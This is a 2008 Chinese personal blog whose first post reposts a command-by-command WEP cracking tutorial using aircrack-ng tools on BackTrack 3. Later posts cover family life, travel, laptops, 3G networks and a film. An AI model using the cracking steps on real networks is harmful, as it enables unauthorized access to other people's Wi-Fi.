2008年12月26日星期五

机器自带的intel网卡破解WEP(转文)

BT3下Intel Proset 3945abg网卡破解wep实战
2008-09-10 20:41:42 浏览(6239)

注1:经过N天的实际操作,无客户端的WEP破解基本上是无法实现的(运行airodump-ng �ivs �w abc(abc是存盘的文件名)
-c (channel号) 网卡名时#data数为0)。

注2:无客户端的概念:只有AP开着,AP下没有任何有线或无线的网络连接。

注3:BT3下运行Kismet的方法:

#ifconfig wlan0 up

#airmon-ng

显示无线网卡为iwl3945

#modprobe �r iwl3945

#modprobe ipwraw

#iwconfig

显示无线网卡已变成wifi0、monitor mode

编辑/usr/local/etc/kismen.conf文件,把source改为source=iwl3945,wifi0,Intel

存盘。

#kismet

用"s"、"f"、"i"显示单个AP的详细信息。


1. 环境:DELL M1210、Intel Proset 3945 a/b/g无线网卡

2. 下载BT3,解压到U盘(根下BOOT、BT3目录)

3. 运行BOOT下的bootinst.bat,制作U盘启动

4. reboot PC,按F12进入BOOT MENU,选USB

5. 进入BT3菜单,选BT3 Graphics mode (compiz Nvidia)-Experimental

6. 打开一个shell

7. #ifconfig �a(记下本机网卡MAC)

8. 显示无线网卡为wlan0

9. #ifconfig wlan0 up

10. #airmon-ng

11. 显示无线网卡为iwl3945

12. #modprobe �r iwl3945

13. #modprobe ipwraw

#airmon-ng start wifi0 6 将网卡设置成AP监听模式


14. #iwconfig

15. 显示无线网卡已变成wifi0、monitor mode

继续:


1. # airodump-ng --ivs -w name -c 6 wifi0(name是存盘的文件名,6是cannel号)

2. 显示要破解的ap的essid 和mac ,并记下ap的essid 和mac。(#data为0时则为无客户端AP,不能继续)

3. 不关闭这个shell,另开一个shell

4. #aireplay-ng -1 0 -e ap的essid -a ap的mac -h 自己网卡的mac wifi0

5. 显示以下信息则为成功

Sending Authentication Request

Authentication successful

Sending Association Request

Association successful :-)

21.#aireplay-ng -5 -b ap的mac -h 自己网卡的mac wifi0来获得xor文件

如果一切顺利,系统将显示

Use this packet ?

输入y回车,将得到一个xor文件(以fragment开头)

再输入ls 查看当前目录,你将看到刚才生成的一个后缀名为xor 的文件。

22.#packetforge-ng -0 -a ap的mac -h 自己网卡的mac -k 255.255.255.255 -l
255.255.255.255 -y fragment -****-****.xor -w mrarp
其中,-l中的l是L的小写,别和1混淆,而其中的fragment-****-****.xor是刚才生成的文件名。

系统显示:Wrote packet to: mrarp

23.#aireplay-ng -2 �r mrarp -x 1024 wifi0(-x 1024 是限定发包速度,避免网卡死机,选择1024)

输入y回车

前面的抓包窗口上的#data将迅速增加

24.另开shell

25.#wesside-ng �i wifi0 �v ap的MAC,破解完成。

26.到#data增加到3万以上时,另开shell

27.#aircrack-ng -n 64 -b ap的mac name-01.ivs

其中64是64位密码,如果是128位,换成128即可。

(注:摘之网文,还有许多破解方法,破解步骤都差不多,要灵活变通,如有疑问,请多交流.)

蓝色命令为主要执行命令
投稿:技术
评论(1) | 浏览(6239) | 收藏到我的网摘 | 邀请好友阅读

给兄弟的邮件,如何保持自己的快速成长

1、观察一个项目是如何操作下来的,怎么谈,怎么实施,怎么验收、回款,如何打出自己的影响,发展人脉
2、项目前期,如何与客户交流需求,收集相关资料,协调公司资源
3、实施过程中,如何协调自己能掌握的资源,做好项目组内各人的配合,有完善实施计划和总结。
4、项目结束,如何验收,快速回款。找机会把项目延续下来,二期三期都能让客户主动找上来,不用再花费太多的市场费用 。
在大公司,可以学到很多东西,工程技能、思考方法、人脉、成熟客户、项目管理.....认真做好每一件事,每一刻都要观察和学习、思考,永远不懒散,保持上进。

对这些东西上心一些,过段时间到我公司里来吧。

2008年12月14日星期日

如何确定,自己笔记本用的是不是最好键盘?

搜了一个晚上,看看自己的小黑,用的是哪种键盘。
手感排名为NMB, ALPS, Chicony
国内许多机器,用的是chicony,好像称为群光,手感很差。

如何不用拆机,查看自己用的是哪种键盘型号呢?

首先,看看自己的机器型号,如 x60s,xxxx-xx
然后找到sn号,都在机器背后 L3-XXXX类似的东西。

到这个网站http://www-3.ibm.com/pc/support/site.wss/warranty/warranty.vm
我主要时间都在等待这人网站的反应了,半天没有连上,以前有时连接时,速度还是挺快的,不知道今天为何速度这么慢。把上面的机器型号和SN号,都填入然后搜索

在下面的选 View parts lookup results for this system
找一下FRU-KS KBD的字样,看到NMB字样了吗?

恩,如何没有这样的字体,抄下那个FRU号码,再到另一个网页具体查看吧
http://www-307.ibm.com/pc/support/site.wss/document.do?sitestyle=lenovo&lndocid=MIGR-62916

虽然查出来,但感觉也并不象吹牛般那样好,显然不如我的cherry键盘。走了,该去锻炼了

2008年12月10日星期三

兰州印象

早上7点,所有人都在睡觉。昨晚上0点以后才睡。早上起来,写一下初到兰州几天的印象。

兰州的空气很差,灰尘比济南还多,空气中弥漫着一种化工或油气的味道。当地消费也是两极分化。平时吃饭,在好的饭店要上一桌子饭菜,一般二百来钱。平时到小店吃饭,都是去干净装修比较好的,一般是三五块钱,有时是当地有名的兰州拉面,有时是肉包粥菜,有时是烧烤(这个稍贵),不比感觉比东部沿海城市的消费,要低很多。东部的收入,拿到这边来花,还是比较爽的。


在住的地方周围逛了逛。整个城市,尤其是中心部位感觉很小,整个市中心,无论从哪头逛,走着都是一二十分钟的路程,永昌路向北,是水势汹涌的黄河。接近黄河边上,有一条东西走向的步行街,名字叫张掖路。非常宽,没有行车,路两边商铺大厦林立,西边有亚欧商厦,西单商厦什么的,向东有百安百货大楼、电子科技大楼什么的,再向东走几个路口,不远就是城边,东方广场,据说旁边的国防百盛商场,东西便宜货又好,没有假货。这是出租车司机师傅的原话。繁华的地方不是很多,只集中在上面这几个地方。尤其是张掖路上最热闹,在靠近永昌路的地方,还有兰州的城隍庙,主要经营古玩字画一类。进入看了看,整个庙保存非常完好,古老的建筑,让人感觉一新,各处屋檐调角墙壁,还有大梁雕刻什么的,在其它地方都看不到。许多地方都是现在人修葺的,已经丢失了大部分古味。这儿却保存的很好,整个大院独立成体,大殿偏房、各处细节,都和昨天刚刚换了住户一般。这也正是让人痛苦的地方。看上面,城隍庙古香古色,看下来却是吆喝着赚钱的小贩,要保持那份欣赏的感觉,实在不容易。


兰州消费不高。平时吃饭,3块钱就能到干净的小店吃的很饱,还是当地特色小吃。卖衣服的店铺,打了促销的牌子,都是30-40块一件。到店里看当地的那种牛皮鞋,一般不会超过150。然而去了一趟亚欧商厦,却看到一个简单的钱包,价格是
2690元。也许和全国各地一样,都有生活在不同境地人们,有的为了生计拼搏,有的却毫无消费上的顾虑。


这样的城市,晚上却很热闹。尤其是永昌路,天一落黑,大街上就挤满了卖各色货品的小摊和行人。再向北,靠近黄河的地方,有各种好点儿的饭店、酒吧、舞厅、KTV什么的,到了晚上0点过后,大街上还有许多人,三三两两地走着。出租车来来去去,繁忙地拉着客人,饭店里还坐着吃饭或聊天的人们。这样一个贫穷的城市,让人恍惚间以为到了广州深圳。

2008年12月4日星期四

硬盘安装liveCD

硬盘安装livecd

有很多的liveCD,是系统维护的好工具。比如无线破解的BT3、BT2,全称为backtrack3,只一张光盘,提供了大量的工具,更对无线破解集成了许多很棒的工具套件。其它,还有damm
small linux,knoppix,bootCd,Zlinux,pfsense,mono,winpe,蓝色火焰,星星雨。。。种类非常多,每一种都不可缺少,提供的功能都不可替代。但这些好工具是压缩集成在光盘上的,想把现成的工具光盘安装到硬盘,需要一定的操作经验。硬盘安装liveCD是个非常有用的功能,但一般操作起来会非常麻烦,经验不足会面临不少的失败阻碍。

下面以backtrack 3的安装为例,说明这种安装常用的步骤和注意事项。
backtrack3是slax为母盘定制的,其实是slackware
12.0修改过来的。现在使用slackware的人非常少了,这种linux版本,更接近bsd的风格,与传统unix的文件结构更加接近。现在流行的ubuntu,redhat,红旗一类,似乎是system
V的文件结构形式,使用了大量的配置工具,打包的系统文件特别臃肿,光安装盘就有好几张光盘。系统速度慢,垃圾文件多。象damm small
linux为代表的这类工具,大小只有50MB,包含了常用的功能,上网的firefox,收邮件,听歌,看电影,办公,聊天。。。。还有什么来着?常用的工具都全了。而BT3不光这个,还提供了开发工具,编译程序,系统源码,成千上万的黑客工具套件,简直应用尽有了。

如何把这些好工具安装到硬盘上面呢?
其实BT3提供了安装向导,但经常会安装失败,有时还会把主分区表破坏,最后整个硬盘只有BT3,我们肯定不想发生这种情况。下面看看如何更快更好地手动安装,保证不会破坏分区表,而且可以多种系统并存。可以在xp下引导bt,也可以在Bt下面引导xp。
首先,最简单的办法。xp下面,安装grub4dos这个工具,只有几十kb大小,我们只拿其中的三个文件。grldr,menu.lst,还有一个grldr.mbr,好像最后这个文件不用也可以。我没试过,照操作来的。然后修改windows的下boot.ini文件。在里面加一行
c:\grldr="my BackTrack3"就可以了。另外,还需要修改menu.lst,这个文件的用法和在linux下面一样,并且提供了许多示例。对于BT3,我们需要添加这样一行记录:
title my BackTrack3
root(hd0,0) (这儿要看安装到在哪个分区)
kernel /boot/vmlinuz max_loop=255 initrd=initrd.gz init=linuxrc
load_ramdisk=1 prompt_ramdisk=0 ramdisk_size=6666 root=/dev/ram0 rw
initrd /boot/initrd.g
boot

把上面几行放到menu.lst里面,就可以引导了。网上还有制作制作精美的一个引导文件,grbt3,另外还加上漂亮的背景,以及中文字体。

这种方法的缺点,是每次引导后,操作记录都无法存盘。因为一切都模拟的光盘,所以每次系统重启后,我们相当于都使用一个完全的新系统,有些类似系统还原卡的原理。另外,在iso文件中的bt3/modules中,只要添加一个别人制作好的lzm文件,就可以对整个系统完成汉化。倒也快捷方便。从这二个方面说,也算是个挺好的优点吧。

下面说第二种方案,把整个BT3安装到硬盘的linux
ext2分区中。说到这儿,想起来,BT3的系统安装程度,似乎把分区设置为ext3格式。不大喜欢这种格式,尤其在个人用的机器上,还是ext2来的实在些。呵呆。
最初的步骤,和一般的linux安装完全一样,硬盘分区格式化什么的,网上有大量的文章讲这些。实在不会,找个图形化的操作工具,如pq一类,照图画猫,几下就可以分好区。下面只说关键的部分。
使用bt3的光盘引导后。将硬盘划好的分区,mount到本地。
1.mkdir /mnt/hda2
2.mount /dev/hda2 /mnt/hda2
3.开始复制
cp --preserve -R
/{bin,boot,home,pentest,root,usr,etc,lib,opt,sbin,var} /mnt/hda2/
,视机器速度而定,我的pII 300的老机器,安装了不到十分钟就完成了。下面的几步就快了,几条命令就可以完成。
4.mkdir /mnt/hda2/{sys,mnt,proc,tmp}
5.mount --bind /dev /mnt/bt3/dev
6.mount -t proc proc /mnt/hda2/proc
7.chmod 777 /mnt/hda2/tmp
完成上面几步,再转换环境,把目标分区去操作
chroot /mnt/hda2 /bin/bash
vi /etc/fstab 根本以后系统使用时的实际情况修改。原来启动系统的分区,都是光盘相关的,这时,一定要改为自己刚刚划分好的分区相关的信息。如刚划分的hda2,文件原为光盘相关的cd0
vi /etc/lilo.conf
这是系统引导文件,跟上面提到的grub有些类似,是稍早一些的引导程度。也非常容易修改,只要把lilo.conf文件中,关于hda的,改为相应的分区命名文字就可以了。
如,硬盘在刚才的分工名,是hda2,就把硬盘设置为hda,label1=bt3,把windows的记录也加进来。label=windows。这方面的文章,网上也非常多。不会的google一下lilo.conf
修改完后,lilo -v,可以看到成功信息:
Add BT3
Add windows
就说明成功。reboot后,就可以轻松享受自己的硬盘版BT3了。同理,照上面的操作,也非常制作出适合自己的U盘版本BT3,u盘版本的各种轻量化小工具集的OS。

先写到这儿,小宝宝睡醒了。正呀呀地朝爸爸招呼呢

2008年11月28日星期五

改了几个地方,重新发布:最近几种值得期待的几线方式

最近值得期待的无线上网方式,可能会有如下几种的商用。

中国电信的cdma1x 提升为3G.他们的升级是最简单的,不需要再新建价值不菲的基站,只要在当前系统上升级一块板卡,就可以将上网速度,提升到3-4Mbpsps左右的带宽,这个速度可以满足许多应用,如视频和VOIP等等。有可能中国电信的3G开通是最早的。这儿的中国电信,现在已经合并到中国电信的C网。还有一种可能,是中国电信保持现有CDMA1x,再新加wifi布点。已经有现实应用证明,电信正在进行这种战略布局。比如福建、上海、南京、厦门、武汉、南昌等地,都有了大量的电信wifi。但
wifi这个东西,怎么说呢,技术起点并不高,投资也很大,覆盖一个区域需要大量的接点设备。而且政策上也有风险。国家一根筋似的,要求所有的wifi节点,必须支持wapi中国自有加密标准。而且要求,原来已有的wifi,也要换成支持wapi。政策上的东西,对具体的商用还是很有影响的。电信为什么不直接升级cdma1x直接到
EVDO呢?据说电信在12月份使用新的189号段,是专为高端用户打造的,以后也会首先在这个号段提供3G功能,但具体这个3G,是通过EVDO实现呢?还是通过wifi?也许答案得让电信自己揭开吧。

原中国联通的G网,与中国网通合并,现在称为中国联合网通通讯公司,简单中国联通。这个G网,可升级为wcdma的3G平台,这个技术是最成熟的,在欧美等地有大量应用,大量的网络都是WCDMA制式,而且相关技术还在快速发展之中,现在已经到了4G,4.5G的实际商用。但缺点是投资挺大。需要新建许多基站,每个基站的投资也得10万左右,算下来是个很惊人的投资规模。wcdma最早可达384kbps的带宽,现在的普通3G制式则可以达到14.4mbps上行,5.6mbps下行。在有些发达国家和地区已经商用的3.5G,则到了28Mbps上行,11Mbps下行。有的地方甚至更高。这个速度确实不错。不过,人们的应用越来越多,对网络依赖也越来越大,吃带宽的东东可不少,每一样新东西都会要求更多更高的带宽。

无线应用的老大,是中国移动,其它都是小兄弟。但现在绑上了TD-WCDMA,前边的路就有些痛苦。现在许多地方的移动网络升级为EDGE了,但速度和cdma1x差不多,何时能将现有网络升级到WCDMA呢?以移动的财大气粗,也许比联通要早一些,但绑着TD-WCDMA这个油瓶,会不会让步伐变慢呢?我还盼着,手里的这个手机号,尽量不更换,早一天用上移动的3G呢。实在不行,到时候只好先换成老联通了。
但移动还有个无线平台,估计用的人不多。在某些酒店、机场,会有移动提供的wifi接入点,是按时间收入的,好像是0.05元/分?具体我也没算过,速度挺快,用的人很少。用自己的手机发一条短信,就可以申请。具体可以问当地的1860。找到接入点后,连接,会跳出一个认证界面,输入用短信申请的账户和密码,就可以用了。可惜因为认证过程中,需要一个心跳窗口一直活动着,所以手机/pda上的wifi无法使用。要想使用,需要安装一个单独的工具才可以,对普通用户来说比较麻烦。移动用了透明网关和radius认证计费,和许多高校里的那种计费网关差不多。
话说,求人不如求已。如何保证方便快捷地无线上网,同时又价格便宜,满足日常应用?
说说我的经验:1、蹭网,不得已时偶尔用一下。2、或者用移动或联通的流量包月套餐,一般是几块钱包多少Mbps,我用的是5元包20Mbps。日常应用包括qq/msn/飞信、收发邮件、看一下新闻、偶尔baidu/google,经常一个月用下来,只有1-2Mbps的流量,根本用不完。3、跑网吧。不是火烧眉毛,又想网速快的话,跑到网吧处理下,费用挺便宜,一二个月才会去一次,体验一下也是不错的。4、上咖啡馆,发呆或看书,有免费的网用,可以呆上一天,也很是不错。5、去朋友那儿,看临近哪儿有朋友,过去聊几句,上上网,哈哈。6、恩,也不用时时挂在网上,脱网的时候,会让人有更多时间思考、学习,和别人交流沟通,也是很不错地。

最近值得期待的无线上网方式

最近值得期待的无线上网方式,可能会有如下几种的商用。

中国电信的cdma1x 提升为3G.他们的升级是最简单的,不需要再新建价值不菲的基站,只要在当前系统上升级一块板卡,就可以将上网速度,提升到上行3-4MB左右,下行11MB左右,这个速度可以满足许多应用,如视频和VOIP等等。有可能中国电信的3G开通是最早的。这儿的中国电信,现在已经合并到中国电信的C网。还有一种可能,是中国电信保持现有CDMA1x,再新加wifi布点。已经有现实应用证明,电信正在进行这种战略布局。比如福建、上海、南京、厦门、武汉、南昌等地,都有了大量的电信wifi。但
wifi这个东西,怎么说呢,技术起点并不高,投资也很大,覆盖一个区域需要大量的接点设备。而且政策上也有风险。国家一根筋似的,要求所有的wifi节点,必须支持wapi中国自有加密标准。而且要求,原来已有的wifi,也要换成支持wapi。政策上的东西,对具体的商用还是很有影响的。电信为什么不直接升级cdma1x直接到
EVDO呢?据说电信在12月份使用新的189号段,是专为高端用户打造的,有3G功能,但具体这个3G,是通过EVDO实现呢?还是通过wifi?也许答案得让电信自己揭开吧。

原中国联通的G网,与中国网通合并,现在称为中国联合网通通讯公司,简单中国联通。这个G网,可升级为wcdma的3G平台,这个技术是最成熟的,在欧洲美国,大量的网络都是WCDMA制式,而且相关技术还在快速发展之中,现在已经到了4G,4.5G的实际商用。但缺点是投资挺大。需要新建许多基站,每个基站的投资也得10万左右,算下来是个很惊人的投资规模。
无线应用的老大,是中国移动,其它都是小兄弟。但现在绑上了t-cdma,前边的路就有些痛苦,现在许多地方的gprs升级为EDGE了,但速度和cdma1x差不多,何时能升级到WCDMA呢?以移动的财大气粗,也许比联通要早一些,但绑着t-cdma这个油瓶,会不会让步伐变慢呢?我还盼着,手里的这个手机号,尽量不更换,早一天用上移动的3G呢。
但移动还有个无线平台,估计用的人不多。在某些酒店、机场,会有移动提供的wifi接入点,是按时间收入的,好像是0.05元/分?具体我也没算过,速度挺快,用的人很少。用自己的手机发一条短信,就可以申请。具体可以问当地的1860。找到接入点后,连接,会跳出一个认证界面,输入用短信申请的账户和密码,就可以用了。可惜因为认证过程中,需要一个心跳窗口一直活动着,所以手机/pda上的wifi无法使用。要想使用,需要安装一个单独的工具才可以,对普通用户来说比较麻烦。移动用了透明网关和radius认证计费,和许多高校里的那种计费网关差不多。
话说,求人不如求已。如何保证方便快捷地无线上网,同时又价格便宜,满足日常应用?
说说我的经验:1、蹭网,不得已时偶尔用一下。2、或者用移动或联通的流量包月套餐,一般是几块钱包多少MB,我用的是5元包20MB。日常应用包括qq/msn/飞信、收发邮件、看一下新闻、偶尔baidu/google,经常一个月用下来,只有1-2MB的流量,根本用不完。3、跑网吧。不是火烧眉毛,又想网速快的话,跑到网吧处理下,费用挺便宜,一二个月才会去一次,体验一下也是不错的。4、上咖啡馆,发呆或看书,有免费的网用,可以呆上一天,也很是不错。5、去朋友那儿,看临近哪儿有朋友,过去聊几句,上上网,哈哈。6、恩,也不用时时挂在网上,脱网的时候,会让人有更多时间思考、学习,和别人交流沟通,也是很不错地。

2008年11月26日星期三

260块钱的ibm笔记本电脑

我有一台笔记本电脑,是260块钱买的。

机器虽然很老,但运行很快,是我的最爱机器。又一次拿出来,每个角度都那么完美。开机,不到一分钟进入系统,毕竟CPU的二级缓存是512KB,几年前,这个容量的缓存在当时流行CPU上面,还是最大的二级缓存。

打开千千静听,听着音乐,打开二十几个网页,机器还是轻松地跑着。上网听歌歌满够了,最主要的,键盘手感一流,现在的机器没有哪个能赶的上。

抚摸着机器,感叹着,毕竟才260块呀。而且买的时候还是新机器。真正的库存机器。卖家也比较实在,说机器开机报错,无法进入系统,只能进CMOS,一到自检状态就嘀嘀报错。于是,260块钱处理了。竟然挺长时间没人买,毕竟是坏机器。我一看错误码,很简单的原因,马上打去260元钱。
机器第二天就速递到家,打开包装,居然还有新机器特有的那种香气。每个地方,都特别新,是刚出厂的那种新。看风扇,也没有一丝灰尘,闪着清洁的铜色。在QQ上面问卖家,原来一直放在仓库里,没人用。点尘未沾。ibm
thinkpad tp600,查了一下序列号,是针对美国国内销售的定制机,难怪二级缓存是512KB的。

下午路过五金店,买了一块钮扣电池。到家就拆机,换上电池,嘀嘀,悦耳的自检过了,进入系统,运行了一下,完全正常。维修费用,一块钮扣电池,3块钱。
晚上兴奋着睡不着,装上FreeBSD,用电池运行,到了后半夜,机器居然还向网上发着测试数据,socket
send了大量的数据包,算了一下,似乎支持了四多个小时了。新机器的电池,也没有这么牛吧?第二天说给朋友们听,所有人都不相信。是啊,连我自己都觉的象在梦里。

机器就是个工具,然而,这个工具却如此让人喜爱。同样的小黑,这台tp600的旁边放着一块thinkpad
x60s,好处是轻巧,只有1.29KG,电池可以用四五个小时,而且是在正常操作着上网时,电池可以用这么长时间。待机时间就更长了,出门在外,有时忙开了,一二天都处在待机状态,打开机器后,还有许多电量。观察了一下,经常8小时待机,还余92%电量,基本一个小时用1%.不过,键盘手感太差,屏幕太小。还有个T60,主要用于跑应用,太厚重,拿在手里半块砖的感觉。倒是非常结实,掉在地上几次,没有任何毛病,运行速度也快,屏幕也不错,键盘手感也说的过去,但感觉,就像面对着一块石头工作,象是没有灵气的石头。就像原来用过的那台华硕,用着更难受,像在用着一块钢块,生硬,伤人。用了这么多机器,真爱原来在这儿,260块钱的tp600。编程、写文章、学习、上网娱乐,都可以很好地用着,而且还带给了我这么多的快乐。

2008年11月22日星期六

sns的竟争

以前听说千[橡公司,就是做校内的这家公司,又做了个开心网,完全照搬最早的那家开心网(后面带数字001的那家www.kaixin001.com做的比较早)做的,名字也起的一样。其实,这一类的网站,前景渺茫,在一阵风式的国内大量此类网站上线,更是热闹了这场闹剧。
其实,最早的sns是国外的facebook,海/内'比较早地学到国内,引发了一股热潮,大家又在拷来拷去了,几乎没有多少创新。
现在的热情,又转到提供app上面了。其实sns本身的力量,还有许多没有挖掘出来。要不是孩子生病,正想写一篇现在针对校内网站的建议呢。可以改进的地方太多了,就这样固步自封了?从另一方面说,抄袭和一窝风地上线同样系统,和种地的农民眼光都是一样的,今年种大姜赚钱,于是大家都种大姜,去年种大白菜赚钱,结果今年大家都种了白菜,行情是,到了出地的时候,跌了几分钱一斤。
要是大家都做自己最擅长的事,就能创新,就能保持持续发展,就能有个良性的发展氛围了。
校内也是学的海/内'吧。在海/内'www.hainei.com上,提供的功能还是比海/内'多不少。

让人郁闷的是,在校内要是发此篇贴子,会不断提供"内容不合适"的提示,发贴失败。上面的内容不合法吗?竟争到屏蔽言论的程度了啊.只要出现最早的那家开心网ww.kaixin001.com的域名,直接就能屏蔽掉了。怎么能这样搞呢?

小善宝病了

咸开文病了。拉肚子,不受控制地拉稀;发烧,
抱在怀里,像抱着一块烧灼的火碳,让人感觉炙烤。也不爱吃饭,原来最喜欢的白面馒头,拿在手里思量了半天,塞在嘴里咽了几下,又吐出来。饼干、水果、稀饭,一口也吃不下。让人看在眼里,急在心里,哄了半天,才示意性地吃下一二口。原来胖嘟嘟的脸,瘦了半圈,扶着拦杆走的时候,都有些站立不稳了。最厉害的时候,手扶着地,努力地想撑起来,最后不得不放弃又躺下来。原来都是一咕噜翻个身就起来了,爬起来飞一般地就爬到喜欢的东西边上。现在几乎不动,额头发烧。
是怎么生的病呢?找了许多原因,每个都有可能。小善宝每天在地上爬,手里难免沾了些脏东西,又爱吃手,会不会因为这个?还有昨天妈妈开会,我在看书,小善宝自个儿光着屁股在屋里转来转去,自个儿玩了半天,有时累了就在冰凉的地上坐下来,是不是受凉了?或者晚上睡觉时蹬了被子,感冒了?或者昨天吃了个不新鲜的水果?或者。。。。
这么乖的小宝宝,从不乱哭乱闹,大人累的时候,就自个儿玩。大人烦的时候,就凑过小脸来,啊唔啊唔爸爸妈妈哥哥姐姐地乱叫一气,还拉着你的手作游戏,逗你开心。每天早上一睁眼,就乐呵呵地在床上转来转去;晚上困了,就钻到爸爸妈妈的怀里,眼睛闭着,额头蹭着你,软软的毛头贴在你的脸上,表示要睡觉了。一家人吃饭的时候,就把他放在餐桌旁边的儿童床上,善宝扶着栏杆,在那儿看每个人的表情,朝每个人说话,谁离的近,还伸手摸一摸,唉唉地招呼着。每次都感叹,上天给我们送来这么一位懂事体贴人的小天使。楼道里有四个一般大的小孩,整天听到别人家里哭闹的声音。我家里却总是善宝,咯咯哈哈呵呵的大笑声,善宝的快乐感染着每个人,让我们家从来没有拥有这么多的欢乐。善宝还喜欢蹭在电脑前赖着不走,前些天看见妈妈在上BBS,凑上来摸着键盘,竟然敲了一串的字:"能奈我何哈哈哈哈哈哈哈哈呵呵呵呵呵呵呵呵呵呵呵呵呵呵呵呵呵呵呵呵",在屏幕上占了满满一行,不知道是怎么敲上去的。还曾经晃悠到我的机器前,趁我不注意,快速地操作了一把"不可恢复删除",到现在我都觉的这是个神奇小子。
这么乖的小宝宝生病了,让人揪心地心疼。养儿方知父母恩。养育一个小孩,多么不容易啊。一天下来,把屎把尿,还要收拾家务,累的腰酸腿疼。真不是件容易的事呢。以前上学的时候,挺瞧不起来那些中年妇女,能力太差,啥也不懂,讲个课都是照本宣科,毫无章法。现在也算有所理解了。孩子是父母最大的财富。为了小宝宝,累点儿也高兴啊。和热恋的感觉一般,苦一点儿累一点儿,可一想到心爱的人,会跑到云�外了。体验一下才会知道,家庭妇女的劳累,并不比职场中的高强度工作差多少。能做好家务活,绝对是值得尊敬的。
虽然宝宝身脚无力,精神还好。吃饱了奶,还会在屋里爬着转来转去,这儿瞅瞅那儿看看,听着另一个房间有动静,就快速赶过去看个究竟。然而,总是拉稀,一不小心就弄脏了衣服。大冬天的,棉袄棉裤不好洗,妈妈一遍遍地冲到卫生间,还要收拾地上的脏物。折腾了一天,终于好些了。肚子有所好转,烧也退去不少。善宝看见爸爸妈妈玩球,乐的大喊大叫,在一边伸手蹬腿的。看见爸爸妈妈吃饭,扶着小床的栏杆,在边上蹦跳,嘴里还发出合着的声音,也不知道说了些什么,情结高涨。晚上临睡,宝宝困的睁不开眼了,洗了把脸精神了些,躺在怀里学认物,一本书翻来翻去好几遍,很认真地手指在上面指来指去。还稍微有些烧。终于快好了。
坚强快乐的小善宝,我的好宝宝。

2008年11月19日星期三

儿子的诡计

儿子11个月的时候,又学会了许多新本事。
下午在餐厅里自个儿抓着苹果条吃,妈妈说,"善宝,来给爸爸出个猴款(扮一下丑的意思)",小善宝扭过头来,鼻子簇成一团,变成迪斯尼乐园里小丑的样子,同时鼻子里还呼哧呼哧地抽着气。"唉呀,小善宝,啥时候学会的?",心里说怎么老教这些呀,前砦天还学小猫叫,学的维妙维肖的,见个人就先啊唔啊唔的。现在学这个丑样,再大些会不会在脸上定型?会不会真的变成小丑的样子啊?
赶紧说,"小善宝怎么变丑了?咱可不学这个,改天爸爸教你变猴猴"。小善宝一听说他变丑了,居然不乐意地抗议起来,扭了头到一边,朝着妈妈救援似的喊起来。老婆赶紧说,"小善宝真棒,再做个鬼脸给妈妈看"。小善宝重新又兴趣盎然,鼻子簇成一团,呼哧呼哧地抽着气。
前几天,还学会了拉锯。晚上,善宝坐在垫子上玩着,看见姥姥过来,丢下玩具,快速地爬地姥姥身边,抓起娃娃的大拇指,身子就前后晃起来。
我在边上看书,看见这样忙问,咦,这是咋回事?原来善宝前几天学了个游戏,拉锯。配着歌谣,"拉锯拉锯,拉倒槐树,槐树倒了,木匠跑了"。小善宝听着歌,前后晃着,乐的小嘴都合不拢了。拉了几下,又重新拿起来玩具,玩了不到半分钟,又重新抓起来姥姥的手指,前后晃起来。如此反复,乐此不疲。晃了一会儿,姥姥晃的也累了。
我看着有趣,"善宝,来,来教教爸爸玩拉锯",小善宝爬过来,装的很权威的样子,要教我怎么玩拉锯。我握着他的小手,热呼呼软呵呵的,没想到他却急着抽出手来,掰开我的手,只抓着我的大拇指,又重新前后晃起来。
当然,得爸爸配音,小善宝合着节奏,嘴里哼哼哈哈的,"打罗筛,罗面来,罗着饽饽吃饭来,你一口,我一口,馋坏了旁边的小狗狗,小狗狗汪汪,看中了善宝的火腿肠。。。。"
后边的也忘了,这个歌只记住前面的几句,后边赶紧给小善宝编了几句顺口溜。
可惜小善宝唱了没几遍,又开始左顾右盼,身子一扭,又爬去抓皮球了。
善宝11月零11天,是为记。学会了扮鬼脸、玩游戏拉锯、和爸爸妈妈打皮球。

007大破量子危机

实在忍不住,跑去看了一个不错的片子。007之大破量子危机。本来我想说很棒的片子,但也并不是前无古人后无来者的大片,只是很久没到电影院,猛一感受那种音效色影,竟有些感觉震憾了。
片子一开场就是激烈的赛车追逐,猛烈的机关枪,惊险不断的碰撞,随时都有生命危险。和以往我们看其它大片不一样,其它大片里的主人公都是神一般的身手,漂亮完美暴力,其它打手上来,都是飞蛾扑火一般,鸡蛋碰石头,马上就给灭了。可是在007里面,身手一流的邦德,也可能随时丧命。在枪林弹雨中,在高速的汽车追逐中,任何人的生命都是那样脆弱。
终于摆脱了杀手们的追击,来到一个朴实的建筑物前。原来是抓住了一个敌方情报人员。军情六处准备好好审一番,可这人一脸不屑,说他们的组织无所不在,正说话间,邦德的一个老同事竟掏枪射来。
为了调查这个神秘的组织。邦德沿着一个个线索追逐下去。和开始一样,很多次都几乎丧命天涯。在水中,开着摩托艇救美;在空中,开着运输机,差点儿被战斗机击落。尤其在空中的一段,几乎看不到生的希望,最后飞机着火,失去原油,也没有高度,而且还在山区,借着最后一股力量直冲天空,两个人用一个降落伞,又差点没打开,直到快落地时,感觉也就还有十几米了,降落伞才撑开,两个人重重地摔在地上。
既有暴烈的动作,又有一个个的阴谋,不断的诡计,不断的事端,不断的线索,感觉挺过瘾。
间谍特工这样的故事非常有诱惑力,几乎每个人,都会神往这样的神秘、刺激的生活。其实和黑客入侵一样,凡事都没有外人想像的那样轻松快乐。这里面的有趣,也包含了痛苦、需要坚韧才能承受的成分。拥有这样生活的人,基本都丧失了常人能够享受的东西,有得必有失,而且这种获得,基本是自私的,只是面向某一个具体组织的完全付出。看了这样的电影,往深里观察一下007,他其实是个不自由不快乐的人,所以,只好关爱美女,借酒浇愁,对死亡无所畏惧,不贪图钱财,随时准备着下一秒丢失生命。
电影最后没有给出最后的答案。这样的组织,也许确实是无处不在。

奇怪的是,电影为什么起了这么个怪名:大破量子危机?许多时候,这些国外的大片,翻译之后就变的怪诞了。懊悔没有看原版的片子。


漫画:
小猪虾米夫妻日记(卓越亚马逊网络独家品种)
一个人住第5年
黑背糗事录--最搞笑、最详尽的嘿咻大教程
找死的兔子
我们YY吧(精美的黑背漫画贴纸)
150cm Life/绘本小天后
黑背启示录--腾讯动漫人气最旺的漫画家黑背之最新爆笑巨作
小老爷们儿那点事儿
张小盒2--office成长记
熟女养成日志

2008年11月15日星期六

企业面临的安全风险

现在的企业,正面临很多的安全风险。
今天去一家国内知名的企业,在国际上也很有名的一家企业。因为内网感染了病毒,影响了ERP、PDM系统,导致两天没法正常工作,我估计损失估计也得几十万吧。
